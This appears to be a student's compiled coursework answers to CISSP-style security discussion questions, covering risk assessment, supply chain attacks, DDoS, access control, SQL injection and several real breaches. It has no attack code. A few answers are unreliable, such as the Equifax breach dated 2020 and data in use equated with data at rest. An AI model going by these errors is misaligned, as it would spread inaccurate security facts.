Question: A medium sized organization of around 30 employees that provides address

correction services to crown corporations such as Canada Post is interested in

understanding its security risk posture. This concern arises from the vast amount of
Personal Identifiable Information (PII) that the organization collects, uses, stores and
discloses. The organization has decided that in order to upgrade its services and allow
for an ease of digitization, the organization will move its entire infrastructure over to a
Cloud Service Provider (CSP). Subsequently, the organization has engaged you to
conduct a risk assessment that is designed to measure risks related to the collection,
use, storage and dissemination of PII.
Using your knowledge from domain 1 to 3, describe how you would go about conducting
this assessment, what would be the key stakeholders you would interview, key systems
you would review, what can you expect to find, and what type of recommendations are
you likely to recommend?

Answer: Assessment

Follow the CIA Triad

 Confidentiality – the Personal Identifiable Information(PII) is the main source of

business so it is very important to protect the data
 Integrity – Data must be transferred over to a CSP only by authorized personal
to ensure the accuracy
 Availability – Database where the data is stored and app which processes
stored data should be readily available to Canada Post

Interview key stakeholders(Organization that collects PII and crown corporation) –

any authorized personnel’s, directors, BSA’s, BRM’s, SA’s).
Analyse and review the below with CSP (Asset Security) :

1. Check which CSP is being used – SAAS/ PAAS/ IAAS

2. Review risks and privacy policies with collection of PII and its usage in
accordance with PIPEDA and verify if the CSP is ISO certified.
3. Review the data security measures that will be taken during the transfer, usage
and storage of the Data into the cloud service and how the data will be erased/
archived after the transfer from the existing data base
4. Ensure that the organization follows the 8 retention steps in events of cyber
attack

Recommendations
From a cyber security/consultant aspect:
1. I would highly recommend the Quantitative assessment to be performed
2. Even though moving to cloud service might seem to be efficient and cost effective,
there will be a higher liability cost upon any attacks or cloud corruptions
3. Given that the PII is the organizations main asset, recommending SAAS will be highly
effective
4. In-house retention team in place is an exceptionally good option for the organization
to have when there is an attack

Question: Have you heard of a software supply chain attack? These attacks one of the
most insidious forms of cyber attacks as they tend to hide themselves within apps and
software and users trust.
Review the article on the following site: “A Mysterious Hacker Group Is On a Supply
Chain Hijacking Spree | WIRED,” Andy Greenburg, 5 March 2019. [Online].
Available: https://www.wired.com/story/barium-supply-chain-hackers (the link will open
in new window)
Without concentrating on the finer details, use your knowledge from domain 4 and 5 to
identify how this case is an example of identity theft and how this case shows how
attackers can remain “anonymous” on the World Wide Web by circumventing
communications and network security.

Answer: Supply chain attacks involves exploiting the users trust in existing platforms
such as well-known software vendors to achieve the end goal of the threat actor. By
compromising and embedding a malicious code in a trusted software which in most
cases will be digitally signed by the vendors, the attacker is able to distribute malicious
code to huge number of end users who use the legitimate software. The malicious code
in a significant number of cases is also not detected by the security technologies in
place to protect the end users or may be classified as a false positive detection by the
end user who trusts the legitimate software without knowing that it contains a malicious
code in it.

The threat actor in most cases embeds minimal amount of malicious code that provides
very basic "backdoor" functionality such as collecting system information and relaying it
to the attacker, communicating with the command and control servers to download
additional payload and commands. By embedding only, the minimal amount of
malicious code that provides only basic functionality, the attackers can keep the
footprint low (to remain “Anonymous”) which in-turn help them avoid detection from
security tools that are used by the end user.

The attacker can also communicate with compromised systems using the backdoor and
send more advanced code/payloads to be executed on the systems to provide
additional capabilities to the attacker including but not limited to the ability to retrieve
files from the compromised system, record keystrokes typed by the end user on the
compromised system, and stealing credentials stored by programs like web browsers.
This stolen information may also include personal information in the form documents
stored in the computer or credentials to websites containing such information which can
used to steal the end user's identity.
Question: A North American auto manufacturer has recently opened up a manufacturing
plant within a country that is classified as an emerging economy. The key challenges
that this North American auto manufacturer faces is that from a security and privacy
perspective, this location does not carry the same stringent security and privacy
requirements to that of North America. There are a number of missing regulations, no
penalties for data breaches, and no government legislation or applicable law around the
collection, usage, storage and dissemination of Personal Identifiable Information (PII).
Using your knowledge from domain 6 and first half of domain 7, what additional detailed
assessments, tests, and possible recommendations you would advise this North
American auto manufacturer to exercise to ensure it does not degrade its existing
stringent security and privacy practices (given there is no incentive to maintain it)?

Answer: A North American auto manufacturer (“Entity”) has recently opened up a

manufacturing plant within a Country that is classified as an emerging economy.
Though the country in which the plant has been located has little to no laws governing
the security and privacy requirements. It is still in the best interest of the Entity to
follow same standard security procedures and policies that are followed in the due to
the fact that overall strength of the security chain is determined by the strength of
weakest link.

If an organization lowers its security standards by taking advantage of the relaxed laws
governing security and privacy in some jurisdictions in order to cut costs then it will
expose itself to a greater risk for the overall organization by creating weak links in the
security chain. Any potential attacker abuses this weakest link to gain access to the
organizations network. Once inside the organizations network, the attack may be able
to access systems and data stored in other countries due the fact that internal traffic
within an organizations network is often unrestricted or minimally restricted in most
cases.

The Entity should follow the following recommendations to achieve an optimal security
posture that carries minimal risk:
1. Establish a global security policy - This policy should define the standard security
procedures and policies that will be applicable throughout the organization irrespective
of the location. This policy must be in compliance with all local laws and regulations
where the Entity operates.
2. Training and Awareness – Developing baselines and guidelines for employees and
awareness programs.
3. Restrict data flow internally - Restricting the data flow internally between various
segments of the organization will prevent the attacker from moving across the network
if one of these segments are breached.
4. Perform penetration testing and vulnerability assessment - Performing periodic
assessment of the organizations network will allow the IT security team to identify any
deficiency in the security perimeter and applying appropriate counter measures/patches
will reduce the risk of breach. The testing process should also involve testing of the
organization physical security capabilities in addition to technological controls.
5. Security Operations – Implement some of the key SECURITY OPERATIONS such as
personnel/ administrative controls, logging and monitoring, provisioning of resources
etc.,

Question: The following incident has occurred:

A. The network department observes a sudden increase (i.e. spike) in firewall drops,
identifying traffic that is targeted to their primary DNS server and originating from
multiple sources. Since the client utilizes an ISP, the same notification is received from
the ISP.
B. Utilizing common well known port ranges for DNS (UDP:53) and HTTP (TCP:80), the
attack vectors look as follows:

 Attack 1 is identified as “Incoming UDP Misuse Attack.”

 Attack 2 is identified as “Fragmentation Misuse.”
 Attack 3 is identified as “Profiled UDP Attack” and utilizes Simple Service
Discovery Protocol (SSDP) traffic.
 Attack 4 is identified as “Bandwidth Attack” and appears to be a combined
UDP:1900 as well as fragmented TCP traffic.

C. The attack targets the company’s primary business functions, the front facing
webpage which has an e-commerce engine and is successful in bringing down the
organization’s website.
What has just happened? How can the organization resume normal business
operations? How could the organization better prepare for such an attack? What can the
ISP do in this case?
Answer: Based on the information provided above, the organization was a target of
Distributed Denial of Service attack (DDoS). A DDoS attack involves overloading any
systems with that handles incoming data beyond its capacity to a point it is not
available for its regular users. DDoS can be performed against devices/services that
operate at various layers of the OSI model including but not limited to firewall and web
servers. All four attack types described above are various types of DDoS techniques
that can be used to overwhelm the resources of a system and make it unavailable for
the intended recipients, in our case the DDoS attack was successful in bringing the e-
commerce platform offline, making it unavailable for the users and ultimately impacting
the revenue of the organization. An organization can mitigate an ongoing DDoS using
various techniques depending on the attack technique used, some of the common
mitigation techniques include blocking the source IP address of the attacker, limiting the
rate of requests per IP per second, implementing filters on the web application firewall
that will discard malicious requests based on known patterns. The organization should
also request an ISP place upstream block on the offending IP at the ISP level so that the
malicious traffic won’t be even able to reach the organization network in the first place.
It is important to remember that these network level blocking can be hard to implement
or manage if DoS attacks are performed from multiple sources as a Distributed Denial of
Service Attack (DDoS). On the longer run, the organization can implement various
security tools that monitor for the symptoms of DDoS attacks and identify them in an
earlier stage and implement a DDoS prevention service that will route all the traffic
though Content Distribution Networks that are harder to be saturated by most DDoS
attacks. The organization can establish agreements with the ISP to increase the network
bandwidth on demand in order to prevent exhaustion of network bandwidth during the
attacks that relay on volumetric bandwidth exhaustion.

Question: The concept of “due care” requires organizations to conduct their business in a
way a “prudent” person would. It refers to minimal judgement, care, and operational
activities that would be reasonably expected under normal circumstances. What are
some of the activities that would fall under “due care?” How does due care differ from
due diligence?

Answer: In simplified terms, Due care refers to reasonable actions that are expected to
be performed by an organization as applicable in any given adverse scenario in order to
minimize risk to the organization. Some of examples of Due Care include but not limited
to actions such as performing password reset of an user account when the user
reported a successful phishing attempt, applying necessary patches for common
application for which an exploit has been recently and implementing new controls and
policies that are required based on any recent change in regulation.
Due diligence refers long term ongoing actions that need to be performed by an
organization in order to detect and respond to any risk that the organization may face.
Due diligent actions in a significant number of scenarios are predecessors to due care
actions. Some of the examples of due diligence actions include but not limited to
establishing a password reset policy which describes when and how to reset user
passwords so that the help desk is has pre documented instructions to perform due care
actions such as resetting user password after a compromise, establishing a vulnerability
scanning policy and conducting regular scans so that vulnerable applications/systems
can be identified and due care actions such as applying patches can be performed and
also holding regular meetings with legal counsel who can advise the technical team on
any new regulations that impact the organization’s existing security posture.
Question: From targeted ads, to your mobile phones tracking every step, to devices that
are perpetually listening - do you think privacy (the way we think of if it) is a thing of the
past? Will regulations like the GDPR, even with their huge fines, be able to fully regulate
the way organizations utilize and protect our personally identifiable information?

Answer:

The answer is “Never”, no regulations will ever be able to fully regulate the way
organizations utilize and protect our Data (PII). In everyday life, we exchange our PII on
a daily basis with retailers such as creating an online account or a rewards card, social
media apps, dating apps, government agencies. Though governments in multiple
jurisdictions has introduced regulations such as GDPR that requires the organization
that process PII of its residents to implement hardened security measures, collecting
only bare minimum information required to provide the proposed service and follow
notification requirements in case of a breach. Some regulations also allow for higher
degree of control over the personal data by requiring the organization to stop using PII
of an individual and erase it if requested by the concerned individual.
However, In almost all cases the user who exchange the PII with an organization or a
service never cares to read through the privacy policy of the organization that collects
the data in order to fully understand how their PII is being used by the organization. By
blindly agreeing to an organizations privacy policy the user legally allows the
organization to use the PII for the organization gain in exchange for often free and
highly customized service offered by the organizations such as search engines,
navigation tools, and dating apps. The users are also usually unaware of the regulations
that offer higher degree of control over their data as a result of which only few users
exercise such right offered by those regulations.
Question: “BIAs... because nobody saw that coming.”
The third pillar of information security is “A-Availability.” What role does a business
impact analysis (BIA) play in creating a business continuity plan (BCP) that ensures
critical business processes are available during and after a disaster?
Answer: A Business Continuity Plan (BCP) is essential for any organization to ensure that
critical business to operate during and after a disaster. A disaster can be of any form
including but not limited to scenarios such as flooding, fire or earthquake. BCP can also
be helpful to ensure that a business can stay operational during potentially disruptive
cyber attacks such as ransomware or DDoS.
Creating a BCP requires multiple tasks involving various stakeholders in the
organization including performing a Business impact analysis (BIA), during which the
stakeholders collects critical data that is required for drafting an effective BCP. This data
includes but not limited to information such as the critical business process and the
assets that support those processes. Potential assets including technical assets such
business data, physical assets such as laptops and servers, and also human resources
who perform the business critical information.
The stake holders will also identify risk associated with these assets such as probability
of any interruption as result impact related to certain assets and the maximum tolerable
downtime for these assets. The organization can also understand quantitative impact of
any interruption such as financial loss and any qualitative impact such as reputation
damage and brand impact. Based on the above discussed information that is collected
during the BIA, the organization can work on the next steps of the BCP such as planning
a recovery strategy, developing a contingency plan, and testing these plans.
Question: “Can you spot supply chain risks?”
The Equifax data breach of 2017 is probably one of the most talked about data
breaches of recent times. Research the anatomy of the breach and discuss about the
components of supply chain risks which might have (directly or indirectly) led to the
breach. Hint: There are risks hiding in the hardware and software supply
chains as well.

Answer: In September 2017, the American multinational company Equifax Inc.

announced a cyber security breach. Equifax collects almost 800 million PII of individuals
and 88 million PII of Businesses world wide as per Wikipedia. Despite of being so
enormous, it is said that it was the carelessness that led to the breach. So, digging
deeper and researching the anatomy of this breach I have learnt the below reasons that
led to this breach1.

On March 7, 2017, Apache Software Foundation discovered a vulnerability (CVE-2017-

5638) in Apache Struts, an open source development framework that was used by
Equifax to create Java applications. Shortly following the discovery of this vulnerability,
Equifax was notified of the same and instructed to apply necessary patches to mitigate
this vulnerability. It is reported that vulnerability scan ran Equifax did not identify any of
the vulnerable/unpatched systems in the Equifax network. As a consequence of the
incomplete results from the vulnerability scan, none of the vulnerable system were
patched which included multiple internets facing system. During May 2020, attacker
was able gain initial foothold in to Equifax environment by exploiting one of the
vulnerable servers that was exposed to the internet. After gaining initial access to the
network, they were able to move laterally to other systems in the network due to
inadequate segmentation of the network. At the end, the attacker was able to steal PII
of approximately 147 million individuals2.

Following this breach, the Visa and MasterCard had reported an increased number of
compromises of credit card accounts as Equifax was one of the important links in the
supply chain of the financial transaction industry. Personal information stolen from
Equifax was in used in various types of credit card frauds which results in a noticeable
spike in number of complaints when compared to the previous year3.

1. https://en.wikipedia.org/wiki/Equifax
2. https://www.csoonline.com/article/3444488/equifax-data-breach-faq-what-happened-
who-was-affected-what-was-the-impact.html
3. https://www.securityweek.com/equifax-hack-keep-your-friends-close-your-supply-
chain-closer

Question: When information is created, someone in the organization must be directly

responsible for it. Establishing data ownership is a critical step in data security, but can
be challenging. How should data ownership be established? Apart from deciding who
accesses their data, what should be the other responsibilities of data owners?

Answer: Who Owns Data? – The data owner is always the Organization or the Individual
assigned by the Organization. Data Ownership is about having legal rights and complete
control over from how the data is created, used, assigned to individuals in the
organization, and shared with third parties outside the organization. It is also only a
data owner who can restrict access depending on who can and who cannot have access.
When information is created, someone in the organization must be directly responsible.
For example – in the organization(Transportation/ logistics) I work for, every employee is
granted restricted/ limited access to the information we handle by the IT Administrator.
Establishing data ownership is a critical step, but can be challenging when the IT
administrator has to make sure that every team runs a different lane of business with
different money values attached to it, so it is the IT administrator's biggest role to make
sure that one team does not have the access to the other teams' customer information
or the financial information that’s not limited to margins, profits, and commission and
document any changes made to the data.
The data owner's job is not limited to assigning access control roles as per access
requirements. Depending on the jurisdiction and its applicable regulations, the data
owner may be required to perform additional tasks such as ongoing audits to ensure the
access is only granted to required by following the principle of least access and also
report any breach to data confidentiality to the concerned authorities.
Last but not least, any organization while hiring an individual who will be accessing any
confidential data should be trained and be educated about integrity and accountability.

Question: Data security controls generally fall into two categories as they relate to the
state of the data: controls pertaining to data at rest and in motion. Do you think there
should be a third tenet to this (i.e., data in use)? Does it differ from data at rest? If so,
discuss some of the controls that pertain specifically to this category (if any)?
Answer: The answer to “Data in use” to be the third tenet will be biased as it doesn’t
differ a lot from “Data at rest”. Lets first look into how they all differ:
Data at rest – Data at rest refers to data stored in one place such as a laptop/CPU or a
Hard/ Flash drive and is not being moved/ transmitted through a network. In this case,
data is protected by a sign on encryption and needs physical access. Data at risk is less
vulnerable compared to the other two states. An example of data at rest, I have created
an excel sheet of my clients' financial balance and saved it in a folder and my laptop is
shut down.
Data in Motion – Data in motion refers to the data moving through an internet network
or being stored on an external device or moved along cloud services. In this case, data
protection while in motion is much critical if not encrypted properly as it is less secure
than data at rest. An example of data in motion, I am accessing my banking information
to view my balance and then logging out, here I am using a proper HTTP to log in and
hashed my password to access the information and logged out.
Data in use – Data in use is the same as data at rest because the data is stored locally
on a hard drive and doesn't leave the device. For example, making an image appear on
my device technically means that data is "in use". However, this data is still located in
the same place in the same location of the hard drive. For this reason, there is no
difference between the data in use and data at rest but indeed the data in us is more
vulnerable than at rest.

Question:
A single-sign on (SSO) solution is often referred to as a “two-edged sword.” Inherently,
SSO eases the burden of having to spend time logging on to each system separately,
but at the same time, if compromised, it might give away the “keys to the castle” to the
adversary. What are your opinions around SSO? Do you think that if implemented
correctly, SSO might increase overall security or not? Why or why not?

Answer: Single Sign-On (SSO) is an amazing way for the organization to streamline user
authentication for various applications and services to which the user may have access
to using a single set of credentials. In most forms of implementation, the authentication
requests are validated with a directory server by the application to which the user
requests access. There are various solutions available for organizations to use
depending on their requirements. Some of the most commonly used solutions include
ADFS(Active Directory Federation Services) and OKTA.

Though SSO can make it easy for the user to authenticate into applications or services,
it can be a challenging process to set up properly and any misconfigurations during the
setup such as improper access controls can grant users with more access than required.
The SSO solutions itself can be susceptible to vulnerabilities that can be exploited by
threat actors to gain access to the organization. In such cases, the attacker may access
to a wide range of applications/services based on the level of access that was exploited.

However, by combining SSO with other security strategies such an MFA, user behavior
analytics, and event monitoring through a SIEM, the overall security of the organization
can be improved as the SSO solution can provide a single point to monitor for
unauthorized access using SIEM and solutions such as MFA can reduce the exposure
due to exploitation of SSO.

Question: “The amount of access someone has depends on the number of years they
have been employed.” We have all heard that statement. It becomes increasingly
challenging to manage access of people throughout their employment, especially when
people transfer to different roles. They tend to carry their previous access along. How
can a properly enforced “Role-Based Access Control” mechanism potentially address
this situation?

Answer: Role-Based Access Control (RBAC), also known as Non-discretionary Access

Control, is based on an employee’s role they get hired for by the organization. RBAC
provides user access to the specified role. In a significant number of cases, roles are not
only based on a single employee’s role; they can also be based on a group of
people/departments or management that the person works with.

For example, if an employee is hired as an account payable and then moved to the
accounts receivable department, the employee should have access to all data in
regards to the payables. It can be easily done when the HR department or the IT
department of the organization has an employee profile and make sure to update the
profile when the employees move to different roles using Role-based access control.

It is also important to understand that the access controls are periodically reviewed
ensure that only necessary access is provided for any role and only required people are
added to such a role. An organization must also open to creating new roles in the access
management system so that users are only assigned the least privileges required for
doing their job instead of assigning them a role with higher privileges due to the sake of
convenience.
Reference:
https://blogs.iuvotech.com/rbac-rule-based-vs.-role-based-access-control
Question:

Week 1 - Assessing and Mitigating Vulnerabilities of

Security Architectures and Design
As part of the weekly reading we have read about various vulnerabilities associated to
design and architecture elements. Choose one vulnerability that you believe is more
critical than others and discuss why you feel it is more critical than others. What would
you do to mitigate the risks associated to such a vulnerability?
Answer: The most critical Vulnerability I found from my reading is “Vulnerabilities in
DataBases”.
A Database is a collection of data at a center that will be used by the organization.
Database architecture is built using a programming language such as SQL to design,
develop, implement, and maintain data storing programs. It is very important to protect
the company’s database from falling into wrong hands as when exploited the data/ PII
stored in the database can put the company at risk not limited to financial risks and
regulatory based risks.
An SQL Injection Vulnerability makes it easier for an attacker to exploit the database
built using SQL. The attackers get unauthorized access to sensitive data such as PII,
financial information, client information, etc., SQL Vulnerabilities are caused by human
error(programmers) while programming/ writing code or an error in the external
software (antivirus, pdf, and more). An error made by the programmer or not properly
scanned software allow the attackers to easily exploit the database by finding these
vulnerabilities.
Once exploited, the attacker uses the SQL injection to find user credentials from the
databases to gain access to all the data in the database server. For example, in an
educational institution, an attacker could use the SQL injection to change student
credentials or grades or even change the unpaid fee status to paid. An attacker can also
use such sensitive information for a Ransomware attack.
These vulnerabilities and attacks could be prevented by taking safety measures such as
training and creating awareness amongst the programmers or anyone building the web
application for the database servers. Control access privileges and IAM should be in
place to make sure the employees are aware of the dos and don’ts. All input commands
processed during programming by programmers/ developers or external software
should be scanned, filtered, and authenticated.
Database Vulnerability is critical than other vulnerabilities because when exploited, data
will be stolen which will put the company at great risk as not only the financial
information is at risk also because the integrity is compromised and the company’s
reputation is at stake.
Question: Week 2 - Assessing and Mitigating
Vulnerabilities of Web-based, Mobile and
Embedded Systems
As part of the weekly reading we have read about various vulnerabilities associated to
design and architecture elements. Choose a public breach that was heavily scrutinized
in the media and assess what systems were compromised and through what specific
vulnerability were these exploited in your opinion?
Answer: Ashley Maddison, the internets #1 Cheating Site has always been my curios
breach even before I had enough knowledge about Cryptography and algorithms and I
have to admit that their slogan was very attractive “Life is short, have an
affair”(obviously, not justifying it).
when the news leaked about the breach that occurred in July 2015 there were way too
many conspiracies alongside the humiliations and public shaming caused to almost 37
million users whose accounts were approximately 300 gigabytes of data. When the
news came out as a general public, I had way too many concerns and questions about
how a website that carries and controls such sensitive Personal Identifiable information
could be so careless and irresponsible and not have a proper security measure in place.
So, what systems were compromised causing the attack? The attack was performed by
the attackers who went by the name “The Impact Team”. The main cause of the
attack was to compromise the User Database. It was found that there were several poor
security credentials associated with their source codes such as database passwords,
Keys/ tokens, and APIs. MD5 hashing was created to be one of the password protectors/
cryptographic functions but it was also known as one with the most extensive
vulnerabilities. The second attack was a result of not following the cryptographic
lifecycle where the account information or any other information was deleted as
promised by Ashley Madison.
In my opinion, the password hashing is a very critical vulnerability so that needs to be
protected there as well as symmetric cryptography will be a good option. It is very
important to understand that the shortest passwords are more prone to be found/
decrypt than a longer one.
Question: Week 3 - Cryptography Treasure Hunt
Decipher the encrypted sentence below and provide a full answer. The sentence is from
a well-known geek-book. Additional HINTS: you will note that the rectangle is 5 columns
wide and 6 rows in height. The encrypted text is from top to bottom, if you are not able
to figure it out, perhaps you are writing it from left to right...
Decrypt the following question:
SGHFLIOAAOTSLNNRHHODKAE NTSLF
Provide the answer via email to the instructor before the end of the week. But do not
post here on Moodle under any circumstances. ALSO - Do not post your results in
on any forum or to Reddit, as you are just spoiling it for everyone else.
Answer the following questions in this week's discussion forum.

1. Without divulging the final answer or the plain-text message, what was your first
observation when looking at the Ciphertext? Why did you feel it was important?
2. Without divulging the final answer or the plain-text message, what hint can you
provide to your group mates related to the material we covered this week?

Answer: First observation - what the gibberish is that? Of course because its the first
long ciphertext after playing with few scrambled words as children.
The hints were right there and very easy steps but I took the harder way searching in
google and reading lots of text and how to crack a ciphertext, encryption and
decryption and when I was tired I finally came back to the hints. Oh Boy! I wasted hours
but learnt different things.
Key is the hint, follow the easy steps - step by step. Lesson learnt - taking easy way
sometimes helps.
Question:

Week 4 - Secure Design in Network Architecture

In this week’s reading assignment there were a number of possible network
communication specific attacks. Select one attack and find an actual security event that
was published in the media related to said attack. Ensure you respond to at least one
post by your classmates.
Answer:
Like most of you, I am going to talk about the most recent network attack – Amazon
Web Services (AWS) attack. DDoS has become one of the most occurring everyday
attacks regardless of the size of the organization and compromises all online services
not limited to Website services, emails, etc., and AWS was the most recent victim.
In short, what is a DDoS attack? A DDoS attack is when a system is overloading the
system with heavy incoming data beyond what it can handle up to a point where it
becomes unavailable for a regular user.
AWS - A 2.3 -terabit-per-second (Tbps) distributed denial of service (DDoS)
attack! Phewww!! Making the biggest DDoS attack in history. So this one DDoS attack
is observed as an SYN flood. The attacker used the SYN flood to flood the server with
multiple requests targeting what was intended which is the servers and the firewalls.
SYN packets may sound small but have a greater impact and very difficult to absorb. It's
like a dominos effect.
The attack was then mitigated by AWS shield, a service designated to protect
customers of Amazon’s on-demand cloud computing platform from DDoS attacks, as
well as from bad bots and application vulnerabilities.
Unfortunately, I couldn’t get a lot of information as Amazon did not disclose the reason
nor the origin.

Reference:
https://www.theverge.com/2020/6/18/21295337/amazon-aws-biggest-ddos-attack-ever-
2-3-tbps-shield-github-netscout-arbor
Question:

Week 6 - Famous Breaches of 2019

Select any news source which discussed a breach, and, using the concepts from the
course, provide your perspective on whether the organization could have improved their
resilience with implementation of any of the topics covered by Domain 3 and 4 in the
textbook.
Answer: During April 2020, Health care giant Magellan Health was a victim of a
ransomware attack. The company immediately engaged its incident response process
and engaged Mandiant, one of the leading incident response providers. During the
incident investigation performed by Mandiant and Magellan, the source of the
compromise was identified as a phishing email sent to one of the employees. Following
the successful compromise of the user account using the phishing email. The attacker
was able to exfiltrate sensitive information including but not limited to names, member
identification numbers, plan types, spending account balances, user reward summaries,
and claims data from the company network. According to some sources, it is also
reported that the attackers were able to install credential-stealing utilities on the
system to harvest additional credentials and escalate privileges.

Based on the publicly available information, we can see that the attackers have used
common tactics, techniques, and procedures that can be stopped easily to carry out the
attack. At the very beginning, the attack was carried out using a phishing email. The
organization can better prepare for such attacks using email security appliances that
scan all incoming email before being delivered to the end user’s mailboxes. However,
the attackers are still good at crafting phishing emails that evade security or even sent
emails from compromised users in other organizations with whom there is a frequent
exchange of emails that may be allowed by the email security appliance. To counter
any such instances where the phishing emails were not blocked by the email security
appliance, the end-user must be mandated to take training on detecting and handling
phishing emails on an annual basis so that they can act as the last line of defense
before the attacker can succeed in compromising the user.

The organization can also add security policies in sensitive systems to prevent logins
from unexpected systems such as user workstations and limit access only through jump
boxes. This would have limited the attacker’s ability to move around laterally towards
sensitive systems. By enhancing the monitoring, logging, and alerting on jump boxes,
the organization can focus the resources towards the activity flowing through the jump
box alone and detect any suspicious connections earlier. The organization can also use
host-based intrusion prevention systems (EDR) to identify and/or block any execution of
unauthorized/malicious tools by the attacker. This will limit the attacker's ability to
cause further damage through stealing credentials or exfiltrating data from the network.

Question:

Week 1 Discussion
Go through the assigned CBK readings for this week to understand methodologies,
frameworks, maturity models, operations and integrated teams. Then, pick one of the
following questions:

1. What development methodologies have you encountered in your career? Did

these seem aligned to the purpose of the system in question? What challenges
did you find (or can you imagine) the developers may have run into? What
challenges do you think the Security people ran into for that system?
2. What benefits do a Maturity Model deliver and how do you go about choosing
one? How would you measure the maturity? Have you ever seen such a model in
use?
3. Change management is often a sleepy and uninspiring topic. Have you ever seen
it fail? What was the effect? If it were you swooping in after the problem, what
best-practices would you suggest to them and why?

Answer: “Change management is often a sleepy and uninspiring topic. Have you ever
seen it fail? What was the effect? If it were you swooping in after the problem, what
best-practices would you suggest to them and why?”
It wasn’t very easy for me to answer either of the questions with non-IT background.
Since I work with a logistics background, I haven’t been involved much in IT roles. Based
on my understanding from the readings, change management is the structured and
defined approach for changing from one state/process/workflow to another.
An organization needs to establish and follow an efficient change management process
in order to ensure that the changes that are being made will not adversely affect the
organization. This is because good change management will require the new change to
be tested in a test environment prior and allow the change to be applied to the
production environment only if no impact was observed in the testing process. In cases,
where the changes cannot be tested, the change management process can also require
the changes to be applied in small batch in production so that the changes can be easily
reversed in case if the new change is causing some impacts. The change management
process will also ensure that the changes are being applied with proper authorization
and using approved methods.
An example of a change management process that can easily go wrong is when an
organization is installing updates to the systems in the environment, operating system
updates have a tendency to break some software functionalities. This can cause a huge
impact on critical systems such as payment processing and e-commerce. In such cases,
I would recommend the organization to establish a change management process that
would require at least the following:
• Test updates in a test environment before applying in a production
environment
• Apply updates in a defined maintenance window so the impact of downtime
can be reduced.
• Apply updates first to non-critical systems then followed by critical systems

Question:

Week 2 Discussion
Read through the CBK topics assigned this week to become familiar with securing the
environment, testing and alerting for associated risks, following software purchase
practices, and understanding coding standards. Then, pick one of the following
questions:

1. Discuss methods and challenges in integrating proper application logging and

monitoring into your software.
2. Summarize practical guidance for acquiring software that results in a confident,
secure purchase. Since “practical” can also mean “not comprehensive,” what top
risks remain?
3. What do you think would be some high-level cultural (i.e. people) challenges in
following secure coding practices, and what do you suggest to counter these?
Answer: "Summarize practical guidance for acquiring software that results in a
confident, secure purchase. Since “practical” can also mean “not
comprehensive,” what top risks remain?"

It was not very easy to answer again without experience as I come from a non-IT
background. Based on my understandings and readings from the CBK, there are always
pros and cons with COTS (Components off-the-shelf), OSS (Open Source Software), or
CUSTOM SOFTWARE.
An organization needs to establish and follow efficient guidance while purchasing
software securely and with confidence keeping the below risks as a top priority:
Top Risks COTS OSS CUSTOM
Ensure that the new software product
that is planned to be acquired fits into
the organization's risk and security
compliance
Any access to the organizational files
should strictly be stated before
purchase
Terms and conditions (the little
asterisk that is always ignored hold
the key information) – no feedback or
data collection or statistics based on
software usage can be collected
without the organizational approval
Security code review/ validation and
verification cannot be neglected as
not all coders are perfect. Everything
needs to be documented
Internal security audit team doing a
Vulnerabilities test, Penetration test
and clearing off any threats

Software licensing must be taken

seriously
Last but not least – Access privileges
and employee security and
awareness training
It was not very easy to answer again without experience as I come from a non-IT
background. Based on my understandings and readings from the CBK, there are always
pros and cons with COTS (Components off-the-shelf), OSS (Open Source Software), or
CUSTOM SOFTWARE.
An organization needs to establish and follow efficient guidance while purchasing
software securely and with confidence keeping the below risks as a top priority:
Top Risks COTS OSS CUSTOM
Ensure that the new software ü ü ü
product that is planned to be
acquired fits into the organization's
risk and security compliance
Any access to the organizational ü ü
files should strictly be stated before
purchase
Terms and conditions (the little ü ü
asterisk that is always ignored hold
the key information) – no feedback
or data collection or statistics based
on software usage can be collected
without the organizational approval
Security code review/ validation ü ü ü
and verification cannot be
neglected as not all coders are
perfect. Everything needs to be
documented
Internal security audit team doing aü ü ü
Vulnerabilities test, Penetration test
and clearing off any threats

Software licensing must be taken ü ü ü

seriously
Last but not least – Access ü ü
privileges and employee security
and awareness training

Question:

Week 3 Discussion
Investigation Types, Logging, and the foundations that will underpin most of what you
do. Then, pick one of the following questions:

1. In an investigation, how much is enough? How do you determine how deep to dig
and what you should, or should not do? Can you think of examples when more is
necessary, and where less is better?
 2. If you were building a security program from scratch, what would you
recommend for logging and why? Identify short range and long-range
considerations/plans.
3. In your own working environment, can you identify examples of foundational
concepts that have been implemented? Discuss why these were done (what are
they controlling). Are there any cons to this? Have you seen (in the media or at
work) where these were missing and led to an incident?

Answer: " In your own working environment, can you identify examples of
foundational concepts that have been implemented? Discuss why these were
done (what are they controlling). Are there any cons to this? Have you seen
(in the media or at work) where these were missing and led to an incident?"
I want to make sure I understood the question right and tackled it appropriately, so
please feel free to correct me if the discussion is not up to standard and how I can
improve it.
At my work, we use a software for the supply chain and it is very necessary we leave a
note when a freight moves from one destination to other such as pick up/ delivery date,
pick up/ delivery appointment time, pick up/ delivery location, who is picking
up(external transportation company or an inhouse driver), mode of transport (truck or
rail), cost to move the freight from point A to point B. This information has to be very
specific and should be documented when there are any changes as any delays could
end up in penalties and any missed information/communication may result in customs
clearance.

In case of an issue or information being tampered with, we always look into the ‘Order
History Notes’ for basic details and ‘Order Audit History’ for more detailed information.
Please see below an example:

In the above example, I am the order owner and another colleague has changed the
invoice total that was only known to me and shouldn’t have been granted access.
The con is anyone who has access to edit the ‘Order Audit History’.
This species hasn’t led to an incident as most of the employees have been trained to
run a check EOD and before billing so issues like these have always been resolved.

Question:

Week 4 Discussion
There are a lot of topics to review in the CBK this week, with most being high level or
brief. Read through, then pick one of the following questions:

1. What do you feel are the most important elements in incident management (i.e.
if you could only do a couple parts perfectly, which ones and why)?
2. Describe your experience with disaster recovery programs. What was the
scenario, what worked, what didn’t, and what would you have done differently (if
it were up to you)?
3. Describe physical and personnel controls that you have noticed in your daily life,
and what they are intended to control. Have you noticed gaps/omissions as well -
and what would those control or protect against?

Answer: “Describe physical and personnel controls that you have noticed in
your daily life, and what they are intended to control. Have you noticed
gaps/omissions as well - and what would those control or protect against?”
Since I work in Logistics the securities are applied not only to the office building but also
to the driver parking, yard where the trucks and trailers are parked, warehouse, repair
shop, and gas station.
Office Building

 Access cards/ logging - used from 6 pm till 8 am as there will no one at the front
desk or no entry. After 8 am the doors are always open but employees will need
an access card to access stairways/ elevator or entry past the front desk to the
main floor office space. As for visitors, have to fill in the information in the iPad
place by the front desk and the security will verify and validate the information
and will contact the employee to escort the visitor. I noticed 2 vulnerabilities 1.
